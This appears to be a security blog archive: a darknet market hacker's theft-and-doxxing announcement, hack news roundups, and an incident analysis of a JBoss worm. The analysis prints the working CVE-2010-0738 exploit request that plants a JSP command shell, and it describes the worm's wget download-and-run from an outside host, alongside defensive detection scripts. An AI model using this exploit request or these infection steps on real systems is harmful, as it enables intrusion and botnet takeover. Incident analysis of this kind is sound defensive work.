Archive for the ‘hax’ Category

In case you missed it, yesterday Caleb .S tweeted about this. For readers who are not familiar, Aero is one of the most popular darknet marketplaces. Unlike other marketplaces, Aero was considered secure and privacy oriented, sometimes going to extreme lengths like what you see below: if you tried to access it with JavaScript enabled in your browser, you were shown the following.

So, what happened? For the past couple of days the administrators of this popular darknet marketplace have been saying that their servers are under DDoS attack. That in itself is neither important nor uncommon, and the Aero administrators decided to fight it by spinning up more mirrors.

The plot twist is that yesterday threat actor “ChUcKyNbUcKy” stepped up and announced that the Aero Server Wallet Tools were hacked on 08 November 2017, after the server had been “rooted”. Below is the announcement “ChUcKyNbUcKy” posted in the Aero support forums.

ChUcKyNbUcKy successfully hacked the Aero Server Wallet Tools on 11/8/2017 after
previously rooted the host server and acquired administrator privileges. We have
compromised the login system and, after bypassing the 2fa login (10/15/2017), may
change PGP and account accounts and change the provider's PGP keys and collect customer
addresses for public release. The BTC and XMR are currently being channeled into CnB's
primary tumbling wallets, where everything is converted to XMR and "staggers" in a
similar way to BTC.
We do not explain how the core aero server was compromised, but we are not affiliated
with LEO or working in correspondence. However, you are aware of our activities. On the
first day, we started diverting the wallet system (withdrawals and deposits) to various
master wallets, we did about 300k and we worked with it about half of the day.
All announcements made by Aero employees are wrong, and they are essentially doing the
same thing we do now with any transactions to cover the losses, as we initially got admins
worth several BTC before they caught our spoofing method to have. The reason why they are
not completely shut down is that they would probably expect to end the fraud anyway.
To repeat that, we did not manipulate transactions in several days. We had stolen a
considerable amount of BTC in the first few days. The Aero admins fixed it, and that's why
some transactions worked. But she spoofs the wallet of user profiles to a master administrator
wallet that has been used since the launch of aero. And turn it into what they do.
As for doxxing, we are customers of certain vendors that we have targeted, not random customers.
We targeted these specific providers for PGP counterfeits. It was essentially the same method we
used to fake the BTC and XMR Wallet Keys for withdrawal. If you have ordered from INSTANTGRAM, GONEPOSTAL,
TRANQUILTREATS, THENOTORIOUS, EL_CHAPO, UK2UK, STEALTHPHORMIE, NIGHTPEOPLE, PILLENDOSE, REMEDYPLUS,
SOUTHERNWONDERZ, or DGSLABZ, BECAUSE PGP TRANSFERRED YOUR ADDRESS AND ACQUIRED YOUR ADDRESS.
Clean house :)
WE ALSO HAVE THE BTC FROM MANY THOSE SELLERS!
WE WILL DOx CUSTOMERS THERE! :) :)
UPDATE: We are currently targeting fraud and CC vendors wallets. We are directing DDOS on all
mirror links, making it harder for aero admins to steal bitcoin :)

The above suggests that threat actor “ChuckyNBucky” (also using the handle “ChuckyNBucky2”) is not only financially motivated but also after public attention and out to prove a point. Based on the post, here is a brief timeline we can deduce from it.

15OCT2017: Bypassed 2FA login system

?????2017: Got root access to the host server

08NOV2017: Access to Aero Server Wallet

08NOV2017: Diverting withdrawals and deposits to various master wallets ($300k stolen before it got fixed)

02DEC2017: Targeting fraud and credit card vendors’ digital wallets

02DEC2017: DDoS Aero and its mirrors

Although the public nature of the announcement makes this a questionable case, there are a few lessons to learn from it that even large corporations fail to apply. Specifically, the following two.

Take responsibility and act. If the provided information is correct, the Aero administrators discovered and fixed the redirection of transactions but never informed the victims of the attack. This is very common even in legitimate businesses, and it never ends well.

DDoS is not only for disruption. Some so-called APT groups have been using DDoS to cover their activities for years. A DDoS generates enough noise and confusion on the victim's side to buy the attackers time. Never treat a DDoS as a plain disruption attack; find out WHY it is happening.

Yesterday (03 November 2017), a threat actor leaked a database dump claiming to originate from the e-Government services website of Florida, USA (Florida.gov). The file is in CSV format and contains 49771 records with the following fields:

Recently a friend of mine asked me to investigate a hacked development server he was using for JBoss application development. I didn’t have enough time, so since it was an automated attack I just cleaned up the server and informed him of its status.

Now that I have found some time I can write this blog post. Just for clarification: if this were a 0day or some sophisticated hack I would never disclose any information, but since this is a very common, already known, automated attack I’m publishing it.

After logging into the server it was pretty obvious, just from checking the running processes with ‘ps’, that this was either a script kiddie or an automated worm/virus attack.

The first thing I did was download a.tar.gz to my workstation to check it out. From a quick look it doesn’t seem like a serious hack; as I said, it’s either a script kiddie or, almost certainly, an automated attack. Given the simplicity of the attack, the obvious next thing to check is how it re-spawns processes to download new binaries and execute them.

A quick look in ‘/var/spool/cron/javadev’ reveals the following cronjobs for the unprivileged user that was running the JBoss Application Server…

This is a very straightforward botnet client that follows this algorithm:
1) Set the username to efd[]
2) Pick a random server from those defined in @sops, unless one is hardcoded
3) Wait for 3 seconds and open a connection to this server on port 8080/tcp
4) Send an HTTP POST request (probably used by the server to identify the client and enable IRC communication)
5) Send the NICK IRC command to set the previously defined username
6) Enter the IRC main loop
7) If you receive a PING, respond with a PONG to keep the IRC connection alive
8) If you receive a “welcome” message, join IRC channel #jbs and send the ‘uname -a’ output (stripped of spaces and newlines)
9) If you receive a message from user ‘iseee’ in the format “.rsh [command]”, execute it in a shell and send back the output
10) If you receive a message from user ‘iseee’ in the format “.get [URL] [times]”, download the given URL using ‘curl’ or ‘wget’ and send back the location of the file
11) If you receive a message from user ‘iseee’ in the format “.post [URL] [Bytes]”, connect to the given URL on port 80/tcp and send an HTTP POST request with a “Content-Length” equal to the number of bytes given in the IRC message
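
The C2 exchange described above, as an added example (not code from the post or from the worm): a small IRC line parser plus a detector that flags, in a captured session, the behaviours the list enumerates. The captured lines, the nick suffix, the hostmasks and the USER line are constructed assumptions for the example; the nick prefix efd, the channel #jbs, the controller nick iseee and the .rsh/.get/.post verbs are the ones the post names.

```python
"""Spot the worm's IRC C2 traffic in a captured session (added example)."""
import re
from typing import Iterable

BOT_NICK_RE = re.compile(r"^efd\d*$")   # the bot sets its nick to efd... (digits assumed)
C2_CHANNEL = "#jbs"
CONTROLLER = "iseee"
C2_VERBS = {".rsh": "remote shell", ".get": "download", ".post": "http-post flood"}


def parse_irc(line: str):
    """Split one IRC line into (prefix_nick, COMMAND, params); a trailing ':' param is kept whole."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
        prefix = prefix.split("!", 1)[0]        # nick!user@host -> nick
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if not parts:
        return prefix, "", []
    command, params = parts[0].upper(), parts[1:]
    if sep:
        params.append(trailing)
    return prefix, command, params


def detect_c2(capture: Iterable[tuple[str, str]]) -> list[str]:
    """capture yields (direction, line); direction is 'C>' (client to server) or 'S>'.
    Returns human-readable findings in order of appearance."""
    findings = []
    for direction, raw in capture:
        nick, cmd, params = parse_irc(raw.rstrip("\r\n"))
        if direction == "C>":
            # step 4 of the algorithm: an HTTP POST on the IRC socket before NICK
            if raw.startswith("POST ") and "HTTP/1." in raw:
                findings.append("bot preamble: HTTP POST sent on the IRC socket")
            elif cmd == "NICK" and params and BOT_NICK_RE.match(params[0]):
                findings.append(f"bot nick: {params[0]}")
            elif cmd == "JOIN" and params and params[0] == C2_CHANNEL:
                findings.append(f"joined C2 channel {C2_CHANNEL}")
        elif direction == "S>" and cmd == "PRIVMSG" and nick == CONTROLLER and len(params) == 2:
            # steps 9-11: orders only count when they come from the controller nick
            verb = params[1].split(" ", 1)[0]
            if verb in C2_VERBS:
                findings.append(f"{C2_VERBS[verb]} order from {nick}: {params[1]}")
    return findings


# Constructed session: what a sniffer on the 8080/tcp connection might see (assumed lines).
SAMPLE_CAPTURE = [
    ("C>", "POST / HTTP/1.1"),
    ("C>", "NICK efd42"),
    ("C>", "USER efd42 8 * :efd42"),
    ("S>", ":irc.example.test 001 efd42 :Welcome to the Internet Relay Network"),
    ("C>", "JOIN #jbs"),
    ("S>", ":irc.example.test PING :irc.example.test"),
    ("C>", "PONG :irc.example.test"),
    ("S>", ":someuser!u@h PRIVMSG #jbs :hello there"),
    ("S>", ":iseee!x@y PRIVMSG #jbs :.rsh id"),
    ("S>", ":iseee!x@y PRIVMSG efd42 :.get http://example.test/a.tar.gz 1"),
]

if __name__ == "__main__":
    for finding in detect_c2(SAMPLE_CAPTURE):
        print(finding)
```

The same parser can be fed from a pcap follow-stream dump; the point of keying the order detection on the controller nick is that a bystander saying “.rsh” in the channel is not an order, exactly as the bot itself checks the sender.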

This simple IRC botnet client is executed through cron, so at least now we know what we are dealing with. Unfortunately, determining how the attacker got in was difficult, since JBoss didn’t have any logging enabled (it was just a development server).
However, from experience I was fairly convinced that this was the all-time classic CVE-2010-0738, and a quick look at /home/javadev/jboss/server/default/deploy/jmx-console.war/WEB-INF/web.xml proved me right: the JMX console was still in its shipped default configuration, and the security constraint quoted below covers only GET and POST, so any other HTTP verb reaches the console unauthenticated…

<!-- A security constraint that restricts access to the HTML JMX console
to users with the role JBossAdmin. Edit the roles to what you want and
uncomment the WEB-INF/jboss-web.xml/security-domain element to enable
secured access to the HTML JMX console. -->
<security-constraint>
<web-resource-collection>
<web-resource-name>HtmlAdaptor</web-resource-name>
<description>An example security config that only allows users with the
role JBossAdmin to access the HTML JMX console web application
</description>
<url-pattern>/*</url-pattern>
<http-method>GET</http-method>
<http-method>POST</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>JBossAdmin</role-name>
</auth-constraint>
</security-constraint>
<login-config>
<auth-method>BASIC</auth-method>
<realm-name>JBoss JMX Console</realm-name>
</login-config>
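
To check a web.xml like the one above for the two properties that matter here, this is an added example (not code from the post or from JBoss). It parses every security-constraint and reports an explicit http-method list, which leaves every verb not listed (HEAD included) unauthenticated and is the essence of CVE-2010-0738, and a missing auth-constraint, which grants the resource to everyone. Both sample files are constructed: the “shipped” one reproduces the constraint quoted above, the “hardened” one drops the http-method elements so the constraint applies to all verbs. Enabling the security-domain in jboss-web.xml, as the comment in the file says, is a separate step this check cannot see.

```python
"""Audit web.xml security constraints for verb-limited coverage (added example)."""
import xml.etree.ElementTree as ET


def _local(tag: str) -> str:
    """Strip an xmlns prefix so DTD-based (JBoss 4) and namespaced web.xml both work."""
    return tag.rsplit("}", 1)[-1]


def audit_security_constraints(web_xml: str) -> list[dict]:
    """Return one finding per <security-constraint>, with a 'problems' list for each."""
    root = ET.fromstring(web_xml)
    findings = []
    for sc in root.iter():
        if _local(sc.tag) != "security-constraint":
            continue
        patterns, methods, roles, has_auth = [], [], [], False
        for el in sc.iter():
            name, text = _local(el.tag), (el.text or "").strip()
            if name == "url-pattern":
                patterns.append(text)
            elif name == "http-method":
                methods.append(text.upper())
            elif name == "auth-constraint":
                has_auth = True              # present but empty means deny-all, which is fine
            elif name == "role-name":
                roles.append(text)
        problems = []
        if methods:
            # Servlet semantics: listing methods restricts the constraint to those methods only
            problems.append(f"only {', '.join(methods)} are constrained on {patterns}; "
                            "any other verb (HEAD, PUT, DELETE, OPTIONS, ...) is served unauthenticated")
        if not has_auth:
            problems.append(f"no <auth-constraint>: {patterns} is granted to everyone")
        findings.append({"url_patterns": patterns, "http_methods": methods,
                         "roles": roles, "problems": problems})
    return findings


# Constructed copy of the shipped jmx-console constraint quoted in the post.
SHIPPED_WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
  <login-config><auth-method>BASIC</auth-method><realm-name>JBoss JMX Console</realm-name></login-config>
</web-app>"""

# Same constraint with the http-method list removed: now every verb is authenticated.
HARDENED_WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
  <login-config><auth-method>BASIC</auth-method><realm-name>JBoss JMX Console</realm-name></login-config>
</web-app>"""

if __name__ == "__main__":
    for label, doc in (("shipped", SHIPPED_WEB_XML), ("hardened", HARDENED_WEB_XML)):
        for finding in audit_security_constraints(doc):
            print(label, finding["problems"] or "ok")
```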

Using the ‘ps’ output shown at the beginning, we can see that the infection followed this order:
1) Make a directory named ‘…’ in the hacked user’s home directory and change into it
2) Download ‘a.tar.gz’ from http://myiphone.dyndns-pics.com/a.tar.gz using ‘wget’
3) Extract ‘a.tar.gz’ to the ‘xzf’ directory
4) Execute the ‘alfa.sh’ shell script

Based on this, we first have to take a look at the ‘alfa.sh’ shell script.

And if you don’t want to read the code, here is what it does:
1) Executes ‘treat.sh’ as a background process
2) If ‘/usr/local/bin/javad’ is already running, exits
3) Executes the Perl script ‘fix.pl’ as a background process
4) Compiles the C files using the included ‘Makefile’ (this time for Linux, see the ‘lnx’ argument)
5) Removes the ‘*.tar.gz’, ‘treat.sh’, ‘*.tar.gz.*’, ‘b.pl’ and ‘alfa.sh’ files
6) Runs ‘pns’ with options ‘-r JBoss’ (search for this response string), ‘-w "HEAD HTTP/1.0"’ (write this request string) and ‘-t 6100’ (connect/read/write time-out in milliseconds) on port 80 or 8080 (randomly selected) against hosts XXX.XXX.0.0/16, where XXX is a random integer from 0 to 255, and saves the result to ‘/tmp/sess_0088025413980486928597bfXXX’, where XXX is a random integer from 0 to 255
7) Parses the output file
8) If it finds a candidate host, attacks it by sending the malicious HEAD request to its JMX console
9) If the server responds with a 200 or 500 code, sends a ‘GET /zecmd/zecmd.jsp’ request to see if the infection succeeded
10) If so, uses the ‘comment’ parameter of that JSP to download, extract and execute ‘a.tar.gz’ on the remote host, exactly as happened on this one

So to better understand the worm we first have to see what the ‘treat.sh’ shell script does. Again, the script was slightly modified/obfuscated, but nothing special. Here is the de-obfuscated ‘treat.sh’.

And here is what this one does:
1) Constructs the file ‘sysdbss.c’
2) Copies ‘fix.pl’ to ‘~/.sysync.pl’ and makes the latter executable
3) Prepares the cronjobs we saw earlier (temporarily stored in /tmp/myc) and installs them in cron
4) Compiles ‘sysdbss.c’ with gcc and installs it as ‘~/.sysdb’
5) Removes all temporary files and the initial scripts
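
For anyone cleaning up another infected host, here is the triage check I would run, as an added example (not code from the post). It walks a filesystem root and reports the artefacts the two scripts leave behind as described above: a ‘…’ directory in a home directory, ~/.sysync.pl and ~/.sysdb, /tmp/myc, the /tmp/sess_0088025413980486928597bf* scan output, and crontab entries under /var/spool/cron. That the crontab lines reference the hidden files by name is an assumption (the post does not show the cron lines), and demo() builds a throwaway tree with constructed files so the scan runs offline.

```python
"""Find the file-system traces of the JBoss worm under a given root (added example)."""
import os
import tempfile

HIDDEN_FILES = {".sysync.pl", ".sysdb"}                 # dropped by treat.sh
SCAN_PREFIX = "sess_0088025413980486928597bf"          # pns output files in /tmp
CRON_MARKERS = (".sysync.pl", ".sysdb", "/usr/local/bin/javad")   # assumed crontab substrings


def find_indicators(root: str) -> list[str]:
    """Return sorted 'reason: path' strings for every artefact found under root."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root)
        parts = [] if rel == "." else rel.split(os.sep)
        for d in dirnames:
            if d == "...":
                hits.append(f"hidden staging dir: {os.path.join(dirpath, d)}")
        for f in filenames:
            full = os.path.join(dirpath, f)
            if f in HIDDEN_FILES:
                hits.append(f"dropped file: {full}")
            elif parts == ["tmp"] and f.startswith(SCAN_PREFIX):
                hits.append(f"pns scan output: {full}")
            elif parts == ["tmp"] and f == "myc":
                hits.append(f"cron staging file: {full}")
            elif parts == ["var", "spool", "cron"]:
                # per-user crontabs: look for the persistence entry
                try:
                    with open(full, encoding="utf-8", errors="replace") as fh:
                        for n, line in enumerate(fh, 1):
                            if any(m in line for m in CRON_MARKERS):
                                hits.append(f"cron persistence ({f}:{n}): {line.strip()}")
                except OSError:
                    pass
    return sorted(hits)


def demo() -> list[str]:
    """Build a constructed tree mimicking the infected host, scan it, and return the hits."""
    with tempfile.TemporaryDirectory() as root:
        home = os.path.join(root, "home", "javadev")
        os.makedirs(os.path.join(home, "..."))
        os.makedirs(os.path.join(root, "tmp"))
        os.makedirs(os.path.join(root, "var", "spool", "cron"))
        for name in HIDDEN_FILES:
            open(os.path.join(home, name), "w").close()
        open(os.path.join(root, "tmp", SCAN_PREFIX + "17"), "w").close()
        open(os.path.join(root, "tmp", "myc"), "w").close()
        with open(os.path.join(root, "var", "spool", "cron", "javadev"), "w") as fh:
            # constructed crontab: one assumed persistence entry, one legitimate job
            fh.write("0 * * * * /usr/bin/perl /home/javadev/.sysync.pl >/dev/null 2>&1\n")
            fh.write("30 2 * * * /home/javadev/backup.sh\n")
        return find_indicators(root)


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

Run find_indicators("/") on the real host; a process listing for the compiled ‘~/.sysdb’ binary and for ‘/usr/local/bin/javad’ completes the picture, since a file scan alone cannot see what is running.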

By now we know exactly which files have been altered, how the system was infected, how the worm spreads and what it is used for. However, we still miss one crucial point: how the vulnerability was exploited. We have the malicious HTTP payload, which is URL encoded. Here is the encoded form:

HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=zecmd.war&argType=java.lang.String&arg1=zecmd&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e&argType=boolean&arg4=True HTTP/1.0\r\n\r\n

It’s a call to the invokeOpByName action on the jboss.admin:service=DeploymentFileRepository MBean, whose store method writes a new WAR named ‘zecmd.war’ containing a JSP page ‘zecmd.jsp’: a common JSP shell that runs whatever is passed in the “comment” parameter through Runtime.exec() and echoes the output. It goes through the misconfigured JMX console we saw earlier, and the request is a HEAD rather than a GET on purpose: the console’s security constraint covers only GET and POST, so HEAD is never authenticated. That verb bypass is CVE-2010-0738, and this single request installs the JSP backdoor.
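
To see the decoded payload and to catch this pattern in web logs, here is an added example (not code from the post or from JBoss). parse_jmx_request() pulls the invokeOpByName parameters out of a request, decodes arg3 (the file body handed to store) and flags the dangerous Java calls in it; scan_access_log() runs that over access-log lines. The request is the one quoted above, split into chunks; the surrounding access-log lines are constructed. The store() argument order (folder, name, extension, content, flag) is the one the request itself implies.

```python
"""Decode a JMX-console DeploymentFileRepository request and scan logs for it (added example)."""
import re
from typing import Optional
from urllib.parse import parse_qsl, urlsplit

# The exact request from the post, as a log line would carry it (no CRLF).
EXPLOIT_REQUEST = (
    "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName"
    "&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store"
    "&argType=java.lang.String&arg0=zecmd.war&argType=java.lang.String&arg1=zecmd"
    "&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3="
    "%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c"
    "%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%20"
    "%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20"
    "%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20"
    "%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20"
    "%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28"
    "%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20"
    "%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20"
    "%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20"
    "%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28"
    "%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20"
    "%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20"
    "%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20"
    "%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20"
    "%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20"
    "%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20"
    "%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e"
    "&argType=boolean&arg4=True HTTP/1.0"
)

DANGEROUS = ("Runtime.getRuntime().exec(", "ProcessBuilder(", "request.getParameter(")
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')   # combined-log request field


def parse_jmx_request(method: str, target: str) -> Optional[dict]:
    """Describe a DeploymentFileRepository store() call hidden in a request, or return None."""
    url = urlsplit(target)
    if not url.path.startswith("/jmx-console/"):
        return None
    kv = dict(parse_qsl(url.query, keep_blank_values=True))   # argN/action/name keys are unique
    if kv.get("action") != "invokeOpByName" or "DeploymentFileRepository" not in kv.get("name", ""):
        return None
    arg_keys = sorted((k for k in kv if re.fullmatch(r"arg\d+", k)), key=lambda k: int(k[3:]))
    args = [kv[k] for k in arg_keys]
    content = args[3] if len(args) > 3 else ""
    return {
        "method": method,
        "operation": kv.get("methodName"),
        "deployed_file": f"{args[0]}/{args[1]}{args[2]}" if len(args) >= 3 else None,
        "content": content,                                   # the decoded JSP
        "dangerous_calls": [d for d in DANGEROUS if d in content],
        "verb_bypass": method not in ("GET", "POST"),         # CVE-2010-0738: constraint lists GET/POST only
    }


def scan_access_log(lines):
    """Yield (line_no, finding) for requests that deploy files through the JMX console."""
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if m:
            hit = parse_jmx_request(m["method"], m["target"])
            if hit:
                yield n, hit


# Constructed access-log excerpt: recon, the exploit, then the first use of the shell.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Jan/2012:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.5 - - [02/Jan/2012:10:00:02 +0000] "GET /jmx-console/ HTTP/1.1" 200 4096',
    f'10.0.0.5 - - [02/Jan/2012:10:00:03 +0000] "{EXPLOIT_REQUEST}" 200 0',
    '10.0.0.5 - - [02/Jan/2012:10:00:05 +0000] "GET /zecmd/zecmd.jsp?comment=id HTTP/1.0" 200 210',
]

if __name__ == "__main__":
    for n, hit in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {hit['method']} deploys {hit['deployed_file']} "
              f"(verb bypass: {hit['verb_bypass']}, calls: {hit['dangerous_calls']})")
        print(hit["content"])
```

Once the shell is deployed, every later hit on /zecmd/zecmd.jsp carries the executed command in its query string, so the same log gives you the attacker's post-exploitation activity for free.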

Now that we also know exactly how the system was exploited, the only thing left is to check the rest of the files used by the worm. Just for reference, here is the ‘Makefile’ used to compile the C programs included in the TAR archive.

This was a recent discovery by Chris Evans and you can read more details in his blog post, available here. Furthermore, you can find information about this incident on The H Open and LWN.net.

So, the backdoor affects specifically version 2.3.4 of the popular FTP daemon and lives in str.c, the file containing the string manipulation routines.

Another quick update on the recent hacks and similar news that made it to the public.

vendor-sec Mailing List
Hehe… This is a cute little story that you can read on various sites. For example, check out this CNET article. According to Marcus Meissner (moderator of the list), their private mailing list had been sniffed since at least January 20. Of course, Mr. Meissner thought it would be polite to let the list members know about his discovery of the compromise by emailing them, and then leave the backdoored system online. This resulted in getting ultra-pwned, with the mailing list getting rm’d (quite expected after his disclosure of the hack). Happily for some people… Tango down! ;P

EMC RSA Hack
Another high-profile hack in the security industry. Check out this ComputerWorld post to get an idea. Unfortunately, the information regarding this issue is limited to the company’s official statements, which makes it quite difficult to know what really happened/is happening.

Anonymous vs Bank of America
Basically, you can get an overview of this operation from countless news websites such as this one, or from Bank of America Suck. I can still recall many so-called “security experts” making fun of Anonymous a couple of years ago. Where are they now?

Anonymous on Bradley Manning’s Side
On the Forbes blog we can read this post about Anonymous’ actions regarding the absolutely unfair and inhuman treatment of Bradley Manning.

French Ministry of Finance Ownage
Another recent and very interesting attack. Here is some information from the Sophos NakedSecurity blog.

PHP.NET Compromise
On the Full-Disclosure mailing list we saw this email today. However, there is still no official report from the PHP project, and the website in question states that the codebase was not backdoored, just altered for demonstration purposes. Currently, the project’s official wiki is offline.

I might have missed some public high-profile hack(s), but I think I have included the most important. If you think something else belongs here, leave a comment to let me know. :)

Unfortunately, I didn’t have time to blog about all the neat recent hacks that took place. For this reason I’ll publish this post, which basically summarizes the most important (in my opinion) hacks.

– Gregory D. Evans / LIGATT Security Ownage
You can find everything you need at attrition.org’s website here. You know, this is one of those attacks most people knew was coming, and it makes perfect sense to both the security industry and security enthusiasts to see Gregory D. Evans getting owned like this.

– Nasdaq Hack
I don’t know anything beyond what is already public regarding this hack, so I won’t comment on it here. You can find information on all the major news media sites such as Reuters, CNBC, MSN Breaking News, etc.

– rootkit.com ownage
Most people interested in computer security are aware of rootkit.com, a community interested in everything about rootkits. It was created in 1999 and many members occasionally release techniques and tools, mainly regarding rootkit development. Yesterday their hacked MySQL database was released to the public through the stfu.cc website.

– HBGary Ownage
Another recent attack on a whitehat. This was a payback attack from Anonymous, who also released more than 4.5GB of private data via torrent, which you can find here. Their message to HBGary is:

Greetings HBGary (a computer "security" company),
Your recent claims of "infiltrating" Anonymous amuse us, and so do your attempts at using Anonymous as a means to garner press attention for yourself. How's this for attention?
You brought this upon yourself. You've tried to bite at the Anonymous hand, and now the Anonymous hand is bitch-slapping you in the face. You expected a counter-attack in the form of a verbal brawl (as you so eloquently put it in one of your private emails), but now you've received the full fury of Anonymous. We award you no points.
What you seem to have failed to realize is that, just because you have the title and general appearance of a "security" company, you're nothing compared to Anonymous. You have little to no security knowledge. Your business thrives off charging ridiculous prices for simple things like NMAPs, and you don't deserve praise or even recognition as security experts. And now you turn to Anonymous for fame and attention? You're a pathetic gathering of media-whoring money-grabbing sycophants who want to reel in business for your equally pathetic company.
